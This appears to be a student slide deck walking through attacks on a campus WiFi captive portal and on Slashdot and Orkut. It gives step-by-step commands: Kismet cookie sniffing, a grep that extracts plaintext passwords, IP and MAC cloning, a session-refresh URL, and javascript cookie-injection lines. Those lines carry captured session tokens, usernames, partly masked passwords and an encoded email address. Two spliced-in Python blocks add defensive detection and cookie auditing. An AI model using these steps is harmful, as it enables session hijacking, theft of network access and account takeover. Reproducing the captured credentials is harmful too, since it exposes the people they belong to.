Smit WiFi_2

Date post: 25-May-2015
Page 1: Smit WiFi_2

Down the rabbit-hole

a sneak peek at the SMIT-WiFi implementation

Amit Saraff, Ashish Shekhar

Page 2: Smit WiFi_2

Tools Used

• Nmap – network scanner
• Wireshark / Ethereal – packet analyzer
• Kismet – wireless sniffer
• BurpSuite – proxy (HTTP header modifier)
• Firefox – web browser
  – Live HTTP Headers
  – User Agent Switcher
  – Tamper Data
  – View Cookie CS
  – NoScript
• Unix tools – wget, curl, ssh, ifconfig etc.
• Intel Centrino-based laptop running Slackware 9

Page 3: Smit WiFi_2

Brief Overview

• IP range: 172.16.183.0/22
• WEP / WPA – no (yes !!)
• 4 different ESSIDs:
  – SMITWiFi1
  – SMITWiFi2
  – SMITWiFi3
  – SMITWiFi4
  – different ESSIDs / same channel ??

Page 4: Smit WiFi_2

Brief Overview (cont..)

• 172.16.183.1 – router / DNS resolver / authenticator

• 172.16.183.2 – 802.11b Access Point

• 172.16.183.3 – D-link DWL-900 AP+ (standard 802.11bg ap)

• 172.16.183.4 – (new) Another access-point ?

Page 6: Smit WiFi_2

Initial Monitoring (cont..)

• and web addresses:
  – www.orkut.com
  – www.cisco.com
  – www.wipro.com
  – www.musicgamesrefer.com
  – www.grisoft.com
  – www.yahoo.com
  – And some more orkut !!

Page 7: Smit WiFi_2

But that's not what we are looking for !!

Page 8: Smit WiFi_2

Wall of Sheep

IP               MAC                User   Password
172.16.183.15    00:12:f0:db:ef:6f  d205a  m_-_-i
172.16.183.23    00:12:f0:64:0a:67  g205a  b_-_i
172.16.183.78    00:13:ce:7b:d7:9b  d108a  1_3
172.16.183.116   00:16:ce:54:69:48  b206a  j_-n
172.16.183.117   00:12:f0:56:b7:3f  k205a  n_-_-_-w
172.16.183.149   00:15:00:22:c4:0f  l205a  p_-_-_-_4
172.16.183.155   00:13:02:43:2b:0d  r305a  r_-_-_a
172.16.183.180   00:12:f0:51:3b:e0  j301a  h_-_-_-a

** and this is just a small part of the list

How about some user account details?

Page 9: Smit WiFi_2

So how did this happen ?

Page 10: Smit WiFi_2

172.16.183.1 – Authentication Server

Page 11: Smit WiFi_2

Talk about multi-platform support

Page 12: Smit WiFi_2

User – Agent Switcher to the rescue

Page 13: Smit WiFi_2

Background magic – how it really works

Page 14: Smit WiFi_2

How hard is it?

• Log the network traffic using Kismet
• And run:

strings Kismet*.dump | grep Cookie | egrep "_Pass=[a-zA-Z0-9]+;"

• to get:

Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293

Cookie: _UserName=r703a; _Pass=manisha; JSESSIONID=2914445C961B072A73498FDCC1CEB9AE

Page 15: Smit WiFi_2

But that isn't very ethical

• Problem – How to get access to the internet without compromising another's account ?

• Solution – Study the entire process and find a work-around.

Page 16: Smit WiFi_2

Brief Introduction to Cookies

No not these “cookies”

Page 17: Smit WiFi_2

So what are they ?

• Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server.

• Used for authenticating, tracking and maintaining specific information about users.

• We saw an example 2-3 slides back.
  – For those who “missed it” here it is again:

Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293

Page 18: Smit WiFi_2

How do they help?

• The SMIT server sets a cookie on each client it authenticates.

• Refreshes it every 180 seconds.
• How do I then get this cookie?
• And how will it help even if I do manage to capture it?

Page 19: Smit WiFi_2

Step 1

Find active hosts on the network: enter 'Kismet'

Page 20: Smit WiFi_2

Step 1 (cont..)

Page 21: Smit WiFi_2

Step 2

Select an active host and note its parameters, i.e. IP address and MAC address.

Page 22: Smit WiFi_2

Step 2 (cont..)

Change settings locally to match the host about to be compromised.

For example:

ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4

route add default gw 172.16.183.1

Page 23: Smit WiFi_2

Step 3

• Fire up your browser – Firefox in our case.

• Type in the following URL :

http://172.16.183.1/24online/webpages/clientlogin.jsp?loginstatus=true&logoutstatus=null&message=&liverequesttime=180&livemessage=null&url=&isAccessDenied=null&fromlogout=null

• This acts as a 'refresh' command to the server, which replies with the validated cookie.

Page 24: Smit WiFi_2

..to get

Page 25: Smit WiFi_2

..and we are online

Page 26: Smit WiFi_2

Step 3 (cont..)

• What this does:
  – Sets you up with the “cookie”
  – Refreshes itself every 180 seconds
  – Voila, you have free internet access (until the guy logs off / you log him off)

• Node goes offline?
  – Rinse and repeat the entire process with another IP.
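One way the portal operator could notice the cloned-station trick from Steps 2 and 3, as an added example that is not part of the deck: it reads a constructed access log of the 180-second refresh requests and flags an IP that shows two session ids or two User-Agents inside one refresh window. The log format, the field set (session id and User-Agent per request) and the function names are assumptions, not anything the SMIT server is known to log.

```python
"""Flag a cloned captive-portal session from the portal's own access log.
Added example, not from the SMIT deck. The portal re-issues its cookie every
180 s, so one honest client refreshes about once per window; a station that
has cloned that client's IP and MAC and also requests clientlogin.jsp shows
up as a second session id or User-Agent for the same IP inside one window.
The log format below is constructed."""
from collections import defaultdict

REFRESH_WINDOW = 180  # seconds between cookie refreshes, as stated in the deck
REFRESH_PATH = "/24online/webpages/clientlogin.jsp"

# Constructed log lines: epoch_seconds ip path jsessionid user_agent
SAMPLE_LOG = """\
1158132000 172.16.183.209 /24online/webpages/clientlogin.jsp 975DCC46 Mozilla/5.0 (Windows NT 5.1)
1158132180 172.16.183.209 /24online/webpages/clientlogin.jsp 975DCC46 Mozilla/5.0 (Windows NT 5.1)
1158132190 172.16.183.209 /24online/webpages/clientlogin.jsp 2914445C Mozilla/5.0 (X11; Linux i686)
1158132360 172.16.183.209 /24online/webpages/clientlogin.jsp 975DCC46 Mozilla/5.0 (Windows NT 5.1)
1158132370 172.16.183.209 /24online/webpages/clientlogin.jsp 2914445C Mozilla/5.0 (X11; Linux i686)
1158132000 172.16.183.15 /24online/webpages/clientlogin.jsp AB12CD34 Mozilla/5.0 (Windows NT 5.1)
1158132180 172.16.183.15 /24online/webpages/clientlogin.jsp AB12CD34 Mozilla/5.0 (Windows NT 5.1)
1158132010 172.16.183.15 /index.html AB12CD34 Mozilla/5.0 (Windows NT 5.1)
"""

def parse_log(text):
    """Yield (timestamp, ip, path, session_id, user_agent) per non-empty line."""
    for line in text.splitlines():
        if line.strip():
            ts, ip, path, sid, ua = line.split(None, 4)
            yield int(ts), ip, path, sid, ua

def find_cloned_sessions(text, window=REFRESH_WINDOW):
    """Return {ip: sorted reasons} for IPs whose refreshes look like two stations."""
    refreshes = defaultdict(list)
    for ts, ip, path, sid, ua in parse_log(text):
        if path == REFRESH_PATH:  # only the cookie-refresh requests matter
            refreshes[ip].append((ts, sid, ua))
    findings = {}
    for ip, rows in refreshes.items():
        rows.sort()
        reasons = set()
        for i, (t0, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - t0 < window]
            if len({sid for _, sid, _ in in_window}) > 1:
                reasons.add("two session ids for one IP inside a refresh window")
            if len({ua for _, _, ua in in_window}) > 1:
                reasons.add("two user agents for one IP inside a refresh window")
        if reasons:
            findings[ip] = sorted(reasons)
    return findings
```

In the constructed log, 172.16.183.209 is refreshed by a Windows browser and a Linux one with different JSESSIONIDs in the same window, while 172.16.183.15 behaves like a single honest client.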

Page 27: Smit WiFi_2

Return to cookie-land

• Authentication mechanisms
  – We just saw an abuse of the implicit trust mechanism guaranteed by cookies
  – But that was local
  – Can it be extended to other sites too?

Page 28: Smit WiFi_2

Presenting Slashdot

• Popular technology portal.
• News site for anything regarding Technology / Linux / Politics / Science / YRO – Your Rights Online and more.
• Uses the HTTP POST mechanism for sending authentication data.

Page 29: Smit WiFi_2

The main page

Page 30: Smit WiFi_2

Login page

Page 31: Smit WiFi_2

Cookie

Page 32: Smit WiFi_2

Exploit -

• To authenticate as that user, simply capture the incoming cookie

• Then in the address bar type in:

javascript:document.cookie='user=609178::Ik2zsyezqK6AIER7rLuyD7; Domain=.slashdot.org; Path=/';

Page 33: Smit WiFi_2

Result ?

Page 34: Smit WiFi_2

So what ?

But then that is hardly any sweat !!

Page 35: Smit WiFi_2

Moving on - orkut.com

• What is orkut?
  – Social networking site.
  – Online community to meet new people and keep in touch with old ones.
  – Now part of the Google empire.
  – On in “at least” 15 of the 20 or so computers in the campus cyber-cafe at any time of the day.

Page 36: Smit WiFi_2

Main page.

Page 37: Smit WiFi_2

First observations.

• Note – The address bar is yellow and there is a lock sign on the taskbar.
  – What it means:
    • Site uses Secure HTTP (port 443 / https)
    • Certificate for validation (AES-256 bit encryption)
    • Trusted certificate issuer – Thawte Consulting cc.
  – Actual login frame URL:

https://www.google.com/accounts/ServiceLoginBox?service=orkut&nui=2&uilel=1&skipvpage=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US

Page 38: Smit WiFi_2

In other words – that information is definitely not being cracked anytime soon.

Page 39: Smit WiFi_2

Cookies, again?

• Cookie generated on login :

Page 40: Smit WiFi_2

Cookies, again ? (cont..)

• 2 cookies set by the orkut domain
  – First one seems to be a user preference cookie
  – Second one is for timezone (??)

Page 41: Smit WiFi_2

Cookie (1)

• Question : Does Cookie 1 alone do the trick then ?

• Solution : Grab another cookie and check.

Page 42: Smit WiFi_2

Back to kismet dumps

• Hunt for a cookie in the previously gathered logs:

strings Kismet-*dump | grep Cookie | grep -i orkut

• To get:

Cookie: orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:

Page 43: Smit WiFi_2

Set this cookie

javascript:document.cookie='orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:; Domain=.orkut.com; Path=/';

Page 44: Smit WiFi_2

To get :

Notice self-post!
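The portal cookie from "How hard is it?" (a password carried in a cookie) and the Slashdot and Orkut replays above share one server-side fix: never put credentials in a cookie, and mark session cookies Secure so the browser never sends them over plain HTTP where a sniffer like Kismet can read them. The check below is an added example, not code from the deck or from either site; the header values, the `audit` and `sent_over` names and the password-name list are assumptions.

```python
"""Audit Set-Cookie headers for the two weaknesses this deck relies on.
Added example, not code from the SMIT deck, Slashdot or Orkut. The portal's
cookie carries the password itself (_Pass=...), and a cookie issued without
the Secure attribute is attached by the browser to plaintext http:// requests
as well, where a wireless sniffer can read it and an attacker replay it.
Header values below are constructed; only the cookie names follow the deck."""
from http.cookies import SimpleCookie

PASSWORD_NAMES = ("pass", "passwd", "pwd")  # assumed name fragments, not from the deck

def parse_set_cookie(headers):
    """Load a list of Set-Cookie header values into one SimpleCookie jar."""
    jar = SimpleCookie()
    for header in headers:
        jar.load(header)
    return jar

def audit(headers, issued_over_https):
    """Return {cookie_name: [problems]}; an empty dict means the headers pass."""
    findings = {}
    for name, morsel in parse_set_cookie(headers).items():
        problems = []
        if any(p in name.lower() for p in PASSWORD_NAMES):
            problems.append("password stored in a cookie")
        if issued_over_https and not morsel["secure"]:
            problems.append("missing Secure: browser will also send it over http://")
        if problems:
            findings[name] = problems
    return findings

def sent_over(headers, scheme):
    """Cookie names a browser would attach to a request on 'http' or 'https'."""
    jar = parse_set_cookie(headers)
    return sorted(n for n, m in jar.items() if scheme == "https" or not m["secure"])

# Constructed headers modelled on the deck's cookies (token values are placeholders)
PORTAL = ["_UserName=m301a; Path=/", "_Pass=123; Path=/", "JSESSIONID=CONSTRUCTED1; Path=/"]
SITE_WEAK = ["user=CONSTRUCTEDID::CONSTRUCTEDTOKEN; Domain=.slashdot.org; Path=/"]
SITE_FIXED = ["user=CONSTRUCTEDID::CONSTRUCTEDTOKEN; Domain=.slashdot.org; Path=/; Secure; HttpOnly"]

if __name__ == "__main__":
    print(audit(PORTAL, issued_over_https=False))       # flags _Pass
    print(audit(SITE_WEAK, issued_over_https=True))     # flags user: missing Secure
    print(audit(SITE_FIXED, issued_over_https=True))    # nothing to report
    print(sent_over(SITE_WEAK, "http"), sent_over(SITE_FIXED, "http"))
```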

Page 45: Smit WiFi_2

Future possibilities ?

• Set up an HTTP server and masquerade as 172.16.183.1 in order to capture logins.

• Attack the hardware itself (vulnerabilities in the server / access points).

• Ban certain clients from access (arp-flooding).

• Put the laptop in “Master” mode to route traffic through it.

Page 46: Smit WiFi_2

Thank you

Questions ?

